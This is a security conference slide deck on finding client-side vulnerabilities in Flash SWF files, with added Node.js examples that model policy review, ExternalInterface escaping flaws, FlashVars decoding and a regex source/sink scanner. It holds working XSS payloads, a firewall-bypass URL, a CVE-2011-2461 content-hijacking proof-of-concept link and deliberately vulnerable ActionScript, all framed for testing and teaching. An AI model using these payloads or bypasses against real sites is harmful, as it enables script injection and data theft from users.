Flash it baby!
Finding vulnerabilities in SWF files (v2.0)
whoami
♦ Security consultant at NCC Group
♦ 10+ years in web application security
♦ Researcher and bug hunter (I am trying to be?!)
♦ @irsdl
♦ https://soroush.secproject.com/blog/
© NCC Group 2
Flash Isn't Quite Dead Yet!
♦ They ignore it, they laugh at it, but they have to fight it!
♦ They may not use it, but probably have it!
♦ SWF in JS libraries, HTML WYSIWYG editors, players in CMSes, …
♦ XSS is XSS no matter where it is!
© NCC Group 3
What's on the Menu Today?
♦ Assumptions:
 Client-side web application issues
 SWF files loaded in a browser from a website (not from the local file system, and not AIR apps)
♦ Excluded:
 Making a website vulnerable by uploading a Flash file
 Exploiting a website by creating a reflected Flash file (e.g. Rosetta Flash)
 Attacking the server side
 Nudity!!!
© NCC Group 4
Introduction
♦ ActionScript is based on ECMAScript 😍
♦ .SWF -> A compiled Flash file (binary) ->We care about this ❤
♦ Versions: 1 and 2; then 3, which supports object-oriented design 💞
© NCC Group 5
Embedding into a HTML Page
♦ Embedded via OBJECT or EMBED tags
 Example with OBJECT:
    <object type="application/x-shockwave-flash" data="file.swf">
      <param name="movie" value="file.swf" />
      <param name="FlashVars" value="param1=value1&p2=v2" />
      <param name="allowscriptaccess" value="always" />
    </object>
 Example with EMBED:
    <embed src="file.swf" type="application/x-shockwave-flash"
      allowScriptAccess="always" FlashVars="param1=value1&p2=v2">
♦ "OBJECT" can also take "allowScriptAccess" as an attribute (not in IE, which only reads the <param>)
♦ Use "TYPE" when the content-type is different
♦ "classid", "codetype" -> obsolete since HTML5
♦ "allowScriptAccess=always" lets the SWF script the hosting HTML page (ExternalInterface, javascript: URLs) whatever domain it comes from!
♦ "allowScriptAccess=samedomain" is the default: only a SWF served from the page's own domain may script it
© NCC Group 6
Bug Hunting Strategy
♦ Finding Flash Files
 Google… filetype:swf site:example.com
 Download open source apps/libs
 Search in contents for SWF
 Search similar open source projects for SWF
♦ Search for known issues
♦ Automated testing
♦ Manual testing
♦ Note: Is it eligible in bug bounty?
 e.g.: https://hackerone.com/yahoo
© NCC Group 7
What Type of Issues?
♦ Insecure crossdomain.xml
♦ CVE-2011-2461 – still Alive!
♦ Vulnerabilities in SWF Files
 Cross-site scripting (XSS)
 Cross-site data hijacking (XSDH?)
 Same Origin Method Execution (SOME)
 Open redirections (doesn’t have a fancy name!)
 Information disclosure - credentials, hidden URLs, etc.
 Spoofing/Defacement via loading remote objects
 Storing sensitive data on the client-side
 Log forging (not really important most of the times)
© NCC Group 8
Insecure crossdomain.xml
♦ Least restrictive policy (any origin, over plain HTTP, with any header, and policy files honoured anywhere on the host):
<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*" secure="false"/>
<allow-http-request-headers-from domain="*" headers="*" secure="false"/>
</cross-domain-policy>
♦ "crossdomain.xml" is also read by Silverlight when there is no "clientaccesspolicy.xml":
 The most secure Flash policy is still insecure for Silverlight, which does not apply the header and HTTPS restrictions that lock it down for Flash:
<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" headers="SOAPAction" secure="true"/>
</cross-domain-policy>
© NCC Group 9
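As an added example (not from the slides), a Node.js script that reviews a crossdomain.xml for the settings called out above. The two policies inside it are constructed copies of the ones on this slide; the element parser is a regex tokenizer, which is enough for this flat attribute-only format, and the Silverlight check encodes the slide's statement that only the domain="*" grant matters to Silverlight.

```javascript
// Added example: reviewing a crossdomain.xml for the weak settings the slide lists.
// The two policies below are constructed copies of the ones on the slide.
const LEAST_RESTRICTIVE = `<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="all"/>
  <allow-access-from domain="*" secure="false"/>
  <allow-http-request-headers-from domain="*" headers="*" secure="false"/>
</cross-domain-policy>`;

const LOCKED_DOWN_FOR_FLASH = `<?xml version="1.0"?>
<cross-domain-policy>
  <allow-access-from domain="*" headers="SOAPAction" secure="true"/>
</cross-domain-policy>`;

// Tokenise the policy into {name, attrs} records. crossdomain.xml is flat and
// attribute-only, so a regex tokenizer is enough here; use a real XML parser
// for anything with nested or text content.
function parsePolicy(xml) {
  const elements = [];
  const tagRe = /<([a-z][\w-]*)\b([^>]*?)\/?>/g;
  const attrRe = /([\w-]+)\s*=\s*"([^"]*)"/g;
  let tag;
  while ((tag = tagRe.exec(xml)) !== null) {
    const attrs = {};
    let attr;
    while ((attr = attrRe.exec(tag[2])) !== null) attrs[attr[1]] = attr[2];
    elements.push({ name: tag[1], attrs });
  }
  return elements;
}

// One finding string per weak setting; an empty array means nothing was flagged.
function reviewPolicy(xml) {
  const findings = [];
  for (const { name, attrs } of parsePolicy(xml)) {
    if (name === 'site-control' && attrs['permitted-cross-domain-policies'] === 'all') {
      findings.push('site-control: permitted-cross-domain-policies="all" honours policy files anywhere on the host');
    }
    if (name !== 'allow-access-from' && name !== 'allow-http-request-headers-from') continue;
    const domain = attrs.domain || '';
    if (domain === '*') {
      findings.push(`${name}: domain="*" grants access to SWFs from any origin`);
    } else if (domain.startsWith('*.')) {
      findings.push(`${name}: domain="${domain}" grants access to every subdomain of ${domain.slice(2)}`);
    }
    if (attrs.secure === 'false') {
      findings.push(`${name}: secure="false" lets SWFs served over plain HTTP read this HTTPS site`);
    }
    if (name === 'allow-http-request-headers-from' && attrs.headers === '*') {
      findings.push('allow-http-request-headers-from: headers="*" lets any custom header be sent cross-origin');
    }
  }
  return findings;
}

// The slide's Silverlight point: with no clientaccesspolicy.xml, Silverlight falls
// back to crossdomain.xml and acts on the domain="*" grant; the headers/secure
// restrictions that make the Flash policy "secure" do not protect it.
function grantsSilverlightAccess(xml) {
  return parsePolicy(xml).some(
    (e) => e.name === 'allow-access-from' && e.attrs.domain === '*');
}

for (const [label, xml] of [['least restrictive', LEAST_RESTRICTIVE],
                            ['locked down for Flash', LOCKED_DOWN_FOR_FLASH]]) {
  const findings = reviewPolicy(xml);
  console.log(`${label}: ${findings.length} finding(s), Silverlight exposed: ${grantsSilverlightAccess(xml)}`);
  for (const f of findings) console.log('  - ' + f);
}
```

Run it with node; the second policy produces a single Flash finding (domain="*") but still grants Silverlight full access, which is the point of the slide.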
Content Hijacking PoC Tool
♦ Cross-Site Content Hijacking (XSCH) PoC:
 https://github.com/nccgroup/CrossSiteContentHijacking
 E.g.: https://query.yahooapis.com/crossdomain.xml
© NCC Group 10
CVE-2011-2461 - The Dead is Alive!
♦ Flex SDK issue (versions 3.x up to 4.5.1)
♦ An extra input parameter makes the compiled application load external SWF files of the attacker's choosing
♦ Attacks:
 Same-Origin Request Forgery
 Cross-Site Content Hijacking
♦ Found by Mauro Gentile (@sneak_) & Luca Carettoni
© NCC Group 11
Finding CVE-2011-2461
♦ ParrotNG to the rescue!
 Comes with a Burp Suite extension (passive scan)!
 Make sure it is working properly -> important ;-)
 Only scans URLs with a .swf extension!
 Can also scan a folder of SWF files
♦ Decompile & search:
 In "mx.modules.ModuleManager"
 A patched version may contain "&& false == true" and a check on Security.sandboxType == Security.REMOTE
♦ Cross-Site Content Hijacking (XSCH) PoC:
 https://github.com/nccgroup/CrossSiteContentHijacking
© NCC Group 12
CVE-2011-2461 Exploitation PoC
♦ "wonderwheel7.swf" was originally hosted on Google.com
♦ ParrotNG detected the issue
♦ e.g. hijacking content from "0me.me" via "15.rs":
 https://15.rs/ContentHijacking/ContentHijackingLoader.html?objfile=https://0me.me/demo/cve-2011-2461/wonderwheel7.swf&objtype=cve-2011-2461&target=https://0me.me/secret.txt&logmode=result&isauto=1
© NCC Group 13
Important: Do Not Reinvent the Wheel!
♦ Search for known vulnerabilities
 e.g.: https://web.archive.org/web/20130730223443/http://web.appsec.ws/FlashExploitDatabase.php
♦ Search their issue tracker for security issues
♦ Old exploits may still be valid with a few changes!
© NCC Group 14
Automated Testing
Listed in the OWASP Flash Security Project:
♦ FlashDiggity
 Decompile -> search using RegEx
 Extractable rules: http://www.bishopfox.com/dictionaries/Flash%20Regexes.txt
 Had problems with AS3 during testing
♦ HP SWFScan (part of HP WebInspect)
 Decompiles AS2 & AS3 -> search using RegEx
 Has module exclusion rules
 The stand-alone version is old; otherwise commercial
♦ HP Fortify
 Scans AS3, Flex 3 & 4 from source code (not SWF)
 Commercial
© NCC Group 15
Updated SWFIntruder +
♦ Updated SWFIntruder:
 Dirty fix for the original SWFIntruder
 Tries several payloads for each input parameter
 Can detect most AS2 FlashVars automatically
 For AS3 the FlashVars names have to be declared
 Good for finding XSS that needs no user interaction
 Runs in a browser - can be slow
 Can be extended by you! https://github.com/irsdl/updated-SWFIntruder
♦ FlashBang
 Runs in a browser
 Based on Mozilla's Shumway
 Easy way to identify FlashVars (just has some bugs!)
 https://github.com/cure53/flashbang
© NCC Group 16
Try it on! Homework!
♦ http://0me.me/swfintruder/testSWF/
 http://0me.me/swfintruder/testSWF/clickTagSample.swf
 http://0me.me/swfintruder/testSWF/fileuploader.swf
 http://0me.me/swfintruder/testSWF/Vulnerable.swf
© NCC Group 17
Manual Testing
♦ Preparing the testing environment
♦ Compiling ActionScript files
♦ Decompiling SWF files
♦ Finding inputs (sources)
♦ Finding usage of dangerous functions (sinks)
♦ Reviewing the logic, finding sensitive strings, reversing, etc.
© NCC Group 18
Preparing the Environment (Windows)
♦ Download the Flash Player debugger (content debugger) version:
 https://www.adobe.com/support/flashplayer/downloads.html
Windows:
♦ Create or modify the "mm.cfg" file in %userprofile%
 e.g. C:\Users\myuser\mm.cfg
 ErrorReportingEnable=1
 TraceOutputFileEnable=1
 MaxWarnings=50
 PolicyFileLog=1
 PolicyFileLogAppend=1
 Add AS3Trace=1 to see even more!
 Default log file location in Windows (the policy file log is written there too):
 %userprofile%\AppData\Roaming\Macromedia\Flash Player\Logs\flashlog.txt
© NCC Group 19
Compiling HelloFlashWorld.as (a "Hello XSS World")
♦ Free recommended IDEs:
 FDT (similar to Eclipse) (preferred for simpler projects)
 FlashDevelop (includes a powerful runtime debugger)
♦ Plus the Flex SDK (its mxmlc compiler builds the .swf) and Java
♦ Code sample (vulnerable to open redirect and XSS):
package {
    import flash.net.navigateToURL;
    import flash.net.URLRequest;
    import flash.display.Sprite;

    public class HelloFlashWorld extends Sprite {
        // Source: attacker-controlled FlashVars / query string, e.g. HelloFlashWorld.swf?target=foo
        private var url : String = root.loaderInfo.parameters.target;

        public function HelloFlashWorld() {
            var request : URLRequest = new URLRequest(url);
            try {
                // Sink: sends the browser to the untrusted URL (open redirect);
                // target=javascript:alert(document.domain) runs in the embedding page
                // when allowScriptAccess permits it (XSS)
                navigateToURL(request);
            } catch (e : Error) {
                // handle error here
            }
        }
    }
}
© NCC Group 20
Decompiling a SWF File
♦ Recommended decompiler: JPEXS Free Flash Decompiler
 Easy to use UI
 Can edit SWF files
 Occasional updates
 Another Java-based tool: can be slow and might crash, but still good!
https://www.free-decompiler.com/flash/
https://github.com/jindrapetrik/jpexs-decompiler
© NCC Group 21
Decompiled, Now What?
♦ AS1/2 or AS3?
 http://dev.sitedaniel.com/swfinfo/swfinfo.swf - added to Updated SWF Intruder
♦ Find input parameters (sources)
 Find their usage
♦ Find interesting/sensitive functions (sinks)
 Check their inputs
♦ Identify insecure policies
 Any interesting behaviour?
♦ Identify sensitive data or hidden URLs
 Can lead to server-side issues (more serious issues)
♦ Identify storage and logging issues
 Cookies and logs
© NCC Group 22
Input Parameters - Sources
♦ Finding a "source":
 Look at the HTML page (DOM viewer) for FlashVars and query-string parameters
 Find similar inputs based on a known input parameter
 AS3 (variables must be declared):
 Search for: "root", "loaderInfo", "parameters"
 e.g.: root.loaderInfo.parameters.inputName
 RegEx: \.(root|loaderInfo|parameters)[^\w]|[^\w](root|loaderInfo|parameters)\.
 AS2 (variables can be undeclared):
 Search for: "_root", "_global", "_level0"
 RegEx: \.(_root|_global|_level0)[^\w]|[^\w](_root|_global|_level0)\.
 Any undeclared variable can be set through FlashVars! Use the Flash debugger log file, which reports them as:
 Warning: Reference to undeclared variable, 'inputName'
© NCC Group 23
Sinks
♦ Sinks - find usage of sensitive functions
 Can run JavaScript in the hosting page:
 AS3: "ExternalInterface.call", "navigateToURL" (javascript: URLs)
 AS2: "getURL", "fscommand"
 ".htmlText" (loads <img> sources, and in AS2 runs asfunction: links)
 Can load objects, or send/receive/store data:
 "XMLLoader", "AMFService", "SWFLoader", "loadVariables", "loadMovie", "loadMovieNum", "LoadVars.load", "LoadVars.send", "NetStream.play", "getDefinition", "FScrollPane.loadScrollContent", "XML.load", "Sound.loadSound", "URLRequest", "URLLoader", "URLStream", "LocalConnection", "SharedObject"
 Can expose Flash functions to JavaScript:
 "ExternalInterface.addCallback" (AS3), ".watch" (AS2)
 Important when combined with an insecure "Security.allowDomain"
♦ No sensitive function = less likely to find a good vulnerability
© NCC Group 24
Source <-> Sink Flow!
♦ Tainted source --> … --> sink!
♦ Sink <-- … <--Tainted source!
♦ Any validation?
 What is allowed?
 Is it good enough?
♦ Any logic?
 Some inputs should be set for something to happen?
 Role of any provided external file/URL
© NCC Group 25
Insecure Policies in SWF Files
♦ Search for "allowDomain" and "allowInsecureDomain"
♦ Security.allowDomain: cross-domain scripting
 The SWF can be scripted by a SWF loaded from another domain
 HTML (JavaScript) from another domain can communicate with the SWF
♦ Security.allowInsecureDomain: lets a SWF served over HTTP script this SWF served over HTTPS
 The other direction (HTTPS scripting HTTP) is already allowed by allowDomain
♦ LocalConnection.allowDomain
 A SWF/AIR app can talk to another SWF/AIR app over a LocalConnection
♦ Not an issue if there is no interesting functionality!
Sensitive Data / Hidden URLs / Gems!
♦ Think like a forensic analyst! Search for:
 URLs
 Emails
 Secret keys and passwords
 Database information
 Etc.
♦ FlashDiggity rules are good:
 http://www.bishopfox.com/dictionaries/Flash%20Regexes.txt
© NCC Group 27
Sensitive Data in Storage!
♦ "SharedObject" = Flash cookies (local shared objects)
 Can even store binary data
♦ "trace" calls used for logging in debug builds
 Make debugging easier
 Leak sensitive data into the log file when the debugger version of the player is used
© NCC Group 28
Find More! Be creative!
♦ Always look at the FlashVars parameter names
 Anything called “onload”, “onclick”, or “redirect”?
♦ Does it load another file when you open it? Find it, abuse it!
♦ Does it accept external configuration files?
 Find a valid config file and manipulate it
 Example: XSS issue in FlowPlayer: https://github.com/flowplayer/flash/issues/263
© NCC Group 29
"ExternalInterface.call" XSS Confusion!
♦ Accepts a JavaScript function name and its arguments
♦ Both can lead to XSS
♦ The first parameter is inserted into the generated JavaScript as-is, so it can be any JavaScript expression, not just a function name
♦ The following parameters (arguments) are escaped, but badly:
 " turns into \"  all good!
 \ doesn't turn into \\  too bad!
 So \" closes the string, e.g. \"))-alert('XSS')}catch(e){}//
 See http://mihai.bazon.net/blog/externalinterface-is-unreliable
♦ Debuggable using the browser console: cause a syntax error with a probe argument such as:
 xxx"'(){}"'(){}'"(){}xxx
© NCC Group 30
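As an added example (not from the slides), a Node.js model of the wrapper Flash Player generates for ExternalInterface.call and of the escaping flaw described above. The wrapper shape and the escaping rules are modelled on what the slide and the linked post describe, not taken from Flash Player; the page callback name myCallback and the recording alert() are assumptions made so the generated code can be run offline.

```javascript
// Added example: a model of the JavaScript that Flash Player builds for
// ExternalInterface.call(fnName, arg) and of the escaping the slide describes
// (double quotes escaped, backslashes not). The wrapper shape is the commonly
// reported one; it is modelled here, not copied from Flash Player.

function flashEscapeArg(arg) {
  return String(arg).replace(/"/g, '\\"'); // " -> \"  but \ stays \
}

function flashGeneratedJs(fnName, arg) {
  // fnName is inserted verbatim; arg is quoted and escaped as above
  return 'try { __flash__toXML(' + fnName + '("' + flashEscapeArg(arg) +
         '")) ; } catch (e) { "<undefined/>"; }';
}

// Evaluate the generated code the way the host page would. The page's callback
// is called myCallback (an assumed name); alert() is replaced by a recorder.
function runInHostPage(js) {
  const alerts = [];
  let error = null;
  try {
    new Function('__flash__toXML', 'myCallback', 'alert', js)(
      (v) => v, (v) => v, (msg) => alerts.push(String(msg)));
  } catch (e) {
    error = e.name; // SyntaxError when the generated code does not parse
  }
  return { alerts, error };
}

// Fix on the ActionScript side: double every backslash before handing the value
// to ExternalInterface.call, so Flash's own quote escaping can no longer be undone.
function asSideEscape(arg) {
  return String(arg).replace(/\\/g, '\\\\');
}

// And never build the first parameter from user input: only a known callback name.
const KNOWN_CALLBACKS = new Set(['myCallback']);
function isAllowedFunctionName(name) {
  return /^[A-Za-z_$][\w$]*$/.test(name) && KNOWN_CALLBACKS.has(name);
}

// The slide's argument payload, \"))-alert('XSS')}catch(e){}// with 1 as the message
const ARG_PAYLOAD = '\\"))-alert(1)}catch(e){}//';
// Function-name injection: any expression that evaluates to something callable
const NAME_PAYLOAD = '(alert(1),String)';

function demo() {
  return {
    benign: runInHostPage(flashGeneratedJs('myCallback', 'hello "world"')),
    argInjection: runInHostPage(flashGeneratedJs('myCallback', ARG_PAYLOAD)),
    nameInjection: runInHostPage(flashGeneratedJs(NAME_PAYLOAD, 'x')),
    argHardened: runInHostPage(flashGeneratedJs('myCallback', asSideEscape(ARG_PAYLOAD))),
    nameRejected: !isAllowedFunctionName(NAME_PAYLOAD),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

Run it with node: the argument injection fires because Flash escapes the attacker's quote but not the backslash placed in front of it, so the string still ends where the attacker wants; doubling backslashes on the ActionScript side before the call keeps the whole value inside the string, and the first parameter should come from an allowlist rather than from FlashVars.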
Bypassing Client Side Protections
♦ Protections on the client side only make it more user friendly
 Not good for security!
♦ Find the responsible function in the source code
 Understand how it works, find the credentials, and bypass it!
 Change the code and save it to bypass the protections
© NCC Group 31
More Issues…
♦ Identify and review the sensitive functions
 Such as login or encryption functions
♦ Flash files can contain unused/commented-out server-side code and information
♦ Identify requests that it sends to the server
 Can lead to finding broken access controls on the server side
♦ Examples:
 Testing an online game?
 Can you go to the next level without playing?
 Does it use encryption?
 Are there any keys stored in the application?
© NCC Group 32
FlashVars Tips!
♦ Passing parameters in the URL:
 File.swf?param1=value1&p2=v2
♦ Invalid percent-encoding is silently removed, so these all decode to param1=value1:
 pa%Xram1=val%Yue1
 pa%=ram1=val%#ue1
 pa%AXram1=val%B#ue1
♦ Sending parameters after "#" is dead? Nope! Hide the "#" behind an invalid escape:
 File.swf?%#param1=value1&p2=v2
♦ In a redirection, %7F-%FF converts to "?"
♦ BOM (byte-order mark) "%EF%BB%BF" = a SPACE character!
♦ Flash in Firefox may not like %00
© NCC Group 33
Examples
♦ Bypassing a firewall that was detecting "domid=" (the browser does not send anything after "#" to the server, but Flash strips the invalid "%#" escape and still parses the parameter):
 https://example.com/foobar/ScrollLine2D.swf?%#domid=%22))}catch(e){};alert(%27External%20Interface%20XSS%20from:%20%27%2bdocument.domain)//&registerwithjs=1
♦ Bypassing an in-app protection that refused inputs from GET (it deleted every FlashVar whose name also appeared in the query string):
 /flashmediaelement.swf?jsinitfunctio%gn=alert`1`
 Its own parseStr does not strip the invalid "%g" escape the way Flash Player does, so the raw key "jsinitfunctio%gn" never matches the decoded key "jsinitfunction" and the parameter survives:
pos = root.loaderInfo.url.indexOf('?');
if (pos !== -1) {
    query = parseStr(root.loaderInfo.url.substr(pos + 1));
    // delete every FlashVar whose name also appears in the query string
    for (var key:String in params) {
        if (query.hasOwnProperty(trim(key))) {
            delete params[key];
        }
    }
}
© NCC Group 34
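As an added example (not from the slides), a Node.js model of the lenient FlashVars decoding the previous slide describes, next to the strict query-string parse the in-app check above relies on. The decoding rules are inferred from the slide's own examples and are an assumption about Flash Player, not its code; the decompiled parseStr is modelled with decodeURIComponent, and the URLs are the ones from these two slides.

```javascript
// Added example: a model of the lenient FlashVars decoding the slide describes,
// next to the strict query-string parse the in-app check above relies on.
// The decoding rules are inferred from the slide's examples and are an
// assumption about Flash Player, not its code.

// Decode one FlashVars token the lenient way: valid %XX escapes are decoded
// (bytes kept 1:1 as characters), an invalid escape is dropped together with
// the character(s) it consumed, and the UTF-8 BOM (%EF%BB%BF) becomes a space.
function flashDecode(s) {
  let out = '';
  for (let i = 0; i < s.length; ) {
    if (s[i] !== '%') { out += s[i]; i += 1; continue; }
    const pair = s.slice(i + 1, i + 3);
    if (/^[0-9a-fA-F]{2}$/.test(pair)) {
      out += String.fromCharCode(parseInt(pair, 16));
      i += 3;
    } else {
      // "%X" drops two characters, "%AX" drops three (pa%Xram1 and pa%AXram1 both give param1)
      i += /^[0-9a-fA-F]$/.test(s[i + 1] || '') ? 3 : 2;
    }
  }
  return out.replace(/\u00EF\u00BB\u00BF/g, ' ');
}

// What Flash Player ends up with: everything after the first "?" is split and
// decoded leniently. A "#" hidden behind an invalid escape ("%#") disappears
// during decoding, which is the slide's trick for keeping parameters alive.
function parseFlashVars(url) {
  const q = url.indexOf('?');
  if (q === -1) return {};
  const params = {};
  for (const pair of url.slice(q + 1).split('&')) {
    if (!pair) continue;
    const eq = pair.indexOf('=');
    const key = flashDecode(eq === -1 ? pair : pair.slice(0, eq));
    params[key] = eq === -1 ? '' : flashDecode(pair.slice(eq + 1));
  }
  return params;
}

// What the server (and a WAF in front of it) sees: the browser never sends the fragment.
function serverSeesQuery(url) {
  const q = url.indexOf('?');
  if (q === -1) return '';
  const hash = url.indexOf('#', q);
  return url.slice(q + 1, hash === -1 ? url.length : hash);
}

// Model of the in-app check shown above: keys from a strict parse of
// loaderInfo.url (an invalid escape is left as-is, like decodeURIComponent
// failing) are deleted from the FlashVars that Flash Player decoded.
function strictQueryKeys(url) {
  const keys = new Set();
  const q = url.indexOf('?');
  if (q === -1) return keys;
  for (const pair of url.slice(q + 1).split('&')) {
    const raw = pair.split('=')[0];
    let key;
    try { key = decodeURIComponent(raw); } catch (e) { key = raw; }
    keys.add(key.trim());
  }
  return keys;
}

function applyGetFilter(params, url) {
  const keys = strictQueryKeys(url);
  const kept = {};
  for (const [k, v] of Object.entries(params)) if (!keys.has(k.trim())) kept[k] = v;
  return kept;
}

function demo() {
  const blocked = 'flashmediaelement.swf?jsinitfunction=alert';
  const bypass = 'flashmediaelement.swf?jsinitfunctio%gn=alert`1`';
  return {
    stripped: parseFlashVars('File.swf?pa%AXram1=val%B#ue1'),
    hiddenHash: parseFlashVars('File.swf?%#param1=value1&p2=v2'),
    serverSees: serverSeesQuery('File.swf?%#param1=value1&p2=v2'),
    blocked: applyGetFilter(parseFlashVars(blocked), blocked),
    bypass: applyGetFilter(parseFlashVars(bypass), bypass),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

Run it with node: the server-side view of the "%#" URL is just "%", while the FlashVars parse still yields param1 and p2, and the "%g" key survives the GET filter because the two parsers disagree on what the key is.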
Demo - Finding Vulnerabilities!
♦ clickTagSample.swf  ActionScript 2
♦ vulnerable.swf  ActionScript 2
♦ Homework:
 fileuploader.swf  ActionScript 3
♦ Answer (printed in white on the slide):
 ?flashButton=:\"))-alert('XSS')}catch(e){}//;
♦ You are ready with more practice!
© NCC Group 35
Used RegExes in Demo
AS3 inputs:
 \.(root|loaderInfo|parameters)[^\w]|[^\w](root|loaderInfo|parameters)\.
AS2 inputs (remember undeclared inputs - follow the sinks):
 \.(_root|_global|_level0)[^\w]|[^\w](_root|_global|_level0)\.
XSS sinks:
 (getURL|ExternalInterface\.call|navigateToURL|\.htmlText)
Sensitive functions:
 (XMLLoader|AMFService|SWFLoader|loadVariables|loadMovie|loadMovieNum|LoadVars\.load|LoadVars\.send|NetStream\.play|getDefinition|FScrollPane\.loadScrollContent|XML\.load|Sound\.loadSound|URLRequest|URLLoader|URLStream|LocalConnection|SharedObject)
Interesting keywords:
 (allowInsecureDomain|allowDomain|ExternalInterface|load|xml|sql|url|flashvar|pass|TextField|encr)
© NCC Group 36
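As an added example (not from the slides), a Node.js script that applies these regexes to a decompiled listing and follows simple assignments from a source to a sink, the source <-> sink flow described on the manual-testing slides. The listing is a constructed AS3 sample built around the HelloFlashWorld class from the compiling slide with a few extra sinks; it is not real decompiler output, and the taint tracking is deliberately line-based and intra-procedural.

```javascript
// Added example: running the slide's source/sink regexes over a decompiled
// ActionScript listing and following simple assignments from source to sink.
// SAMPLE_AS3 is a constructed sample, not real decompiler output.

const SAMPLE_AS3 = `package {
  import flash.net.navigateToURL;
  import flash.net.URLRequest;
  import flash.display.Sprite;
  import flash.external.ExternalInterface;
  import flash.text.TextField;
  public class HelloFlashWorld extends Sprite {
    private var url : String = root.loaderInfo.parameters.target;
    private var cb : String = root.loaderInfo.parameters.callback;
    private var title : String = "static title";
    private var txt : TextField = new TextField();
    public function HelloFlashWorld() {
      var request : URLRequest = new URLRequest(url);
      navigateToURL(request);
      ExternalInterface.call(cb, "loaded");
      ExternalInterface.call("onReady", title);
      txt.htmlText = root.loaderInfo.parameters.msg;
    }
  }
}`;

// The regexes from the slides, with their backslashes restored.
const AS3_SOURCE = /\.(root|loaderInfo|parameters)[^\w]|[^\w](root|loaderInfo|parameters)\./;
const AS2_SOURCE = /\.(_root|_global|_level0)[^\w]|[^\w](_root|_global|_level0)\./;
const XSS_SINK = /(getURL|ExternalInterface\.call|navigateToURL|\.htmlText)/;
const LOAD_SINK = /(XMLLoader|AMFService|SWFLoader|loadVariables|loadMovie|loadMovieNum|LoadVars\.load|LoadVars\.send|NetStream\.play|getDefinition|FScrollPane\.loadScrollContent|XML\.load|Sound\.loadSound|URLRequest|URLLoader|URLStream|LocalConnection|SharedObject)/;

// Name assigned on this line: "var x ..." or a bare "x = ..." (not "==").
function assignedName(line) {
  const m = /(?:\bvar|\bconst)\s+(\w+)|^\s*(\w+)\s*=(?!=)/.exec(line);
  return m ? (m[1] || m[2]) : null;
}

function wordRegex(names) {
  return new RegExp('\\b(' + [...names].join('|') + ')\\b');
}

function scanDecompiled(source) {
  const lines = source.split('\n');
  const isImport = (l) => /^\s*import\b/.test(l);
  const isSource = (l) => AS3_SOURCE.test(l) || AS2_SOURCE.test(l);
  const tainted = new Set();
  // 1. variables assigned straight from a source
  for (const line of lines) {
    if (isSource(line) && !isImport(line)) {
      const name = assignedName(line);
      if (name) tainted.add(name);
    }
  }
  // 2. propagate through assignments until nothing changes
  let changed = tainted.size > 0;
  while (changed) {
    changed = false;
    const re = wordRegex(tainted);
    for (const line of lines) {
      const name = assignedName(line);
      if (!name || tainted.has(name)) continue;
      const rhs = line.slice(line.indexOf('=') + 1);
      if (re.test(rhs)) { tainted.add(name); changed = true; }
    }
  }
  // 3. every sink, marked tainted when it touches a source or a tainted name
  const re = tainted.size ? wordRegex(tainted) : null;
  const findings = [];
  lines.forEach((line, i) => {
    if (isImport(line)) return;
    const kind = XSS_SINK.test(line) ? 'xss-sink' : LOAD_SINK.test(line) ? 'load-sink' : null;
    if (!kind) return;
    findings.push({
      line: i + 1,
      kind,
      tainted: isSource(line) || (re !== null && re.test(line)),
      text: line.trim(),
    });
  });
  return { tainted: [...tainted], findings };
}

const result = scanDecompiled(SAMPLE_AS3);
console.log('tainted names: ' + result.tainted.join(', '));
for (const f of result.findings) {
  console.log(`${f.tainted ? 'TAINTED ' : 'constant'} ${f.kind} line ${f.line}: ${f.text}`);
}
```

Run it with node: the navigateToURL, URLRequest, ExternalInterface.call(cb, ...) and htmlText lines come out tainted, while the ExternalInterface.call with a constant function name and a constant argument is reported as a sink with no reachable source, which is the triage order the slides suggest.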
Final Notes
♦ Search in your proxy logs for “SWF” files!
♦ JS libraries and plugins can contain Flash files
♦ Can be slow – don’t panic! Plan ahead!
♦ Review the API references for any security-related functions:
 AS2: http://help.adobe.com/en_US/FlashPlatform/reference/actionscript/2/
 AS3: http://help.adobe.com/en_US/FlashPlatform/reference/actionscript/3/
♦ The following resource is also recommended for code review:
 http://www.hpenterprisesecurity.com/vulncat/en/vulncat/index.html
♦ Flash files can send requests to their own server while you test them!
♦ Downloading random Flash files is dangerous but fun
 We all know why!
© NCC Group 37
Thank you! Questions? Really? Why?! ;)
♦ Sample files in: https://github.com/irsdl/Flash-Files-Vulnerability-Database
© NCC Group 38
References & Further Reading - 1
♦ Securely deploying cross-domain policy files
 http://blogs.adobe.com/security/2009/11/securely_deploying_cross-domai.html
♦ Related to Flash policy file
 http://www.adobe.com/devnet/adobe-media-server/articles/cross-domain-xml-for-streaming.html
♦ Security Domains, Application Domains, and More in ActionScript 3.0
 http://www.senocular.com/flash/tutorials/contentdomains/
♦ Penetration testers guide
 http://www.ivizsecurity.com/blog/web-application-security/testing-flash-applications-pen-tester-guide/
♦ Exploiting CVE-2011-2461 on google.com
 http://blog.mindedsecurity.com/2015/03/exploiting-cve-2011-2461-on-googlecom.html
♦ AS3 hidden treasure in the mm.cfg file
 https://jpauclair.net/2010/02/10/mmcfg-treasure/
© NCC Group 39
References & Further Reading - 2
♦ ParrotNG project to find CVE-2011-2461 vulnerable files
 https://github.com/ikkisoft/ParrotNG
♦ Testing for Cross site flashing
 https://www.owasp.org/index.php/Testing_for_Cross_site_flashing_(OTG-CLIENT-008)
♦ Blinded by Flash: Widespread Security Risks Flash Developers Don't See
 https://www.blackhat.com/presentations/bh-dc-09/Jagdale/BlackHat-DC-09-Jagdale-Blinded-by-Flash.pdf
♦ SWF INFO: WIDTH, HEIGHT, SWF VERSION, ACTIONSCRIPT VERSION, FRAMERATE
 http://blog.sitedaniel.com/2009/11/swf-info-width-height-swf-version-actionscript-version-framerate/
♦ Creating more secure SWF web applications
 http://www.adobe.com/devnet/flashplayer/articles/secure_swf_apps.html
♦ OWASP Flash Security Project
 https://www.owasp.org/index.php/Category:OWASP_Flash_Security_Project
© NCC Group 40
References & Further Reading - 3
♦ Same Origin Method Execution (SOME)
 http://www.benhayak.com/2015/06/same-origin-method-execution-some.html
♦ WordPress SOME bug in plupload.flash.swf
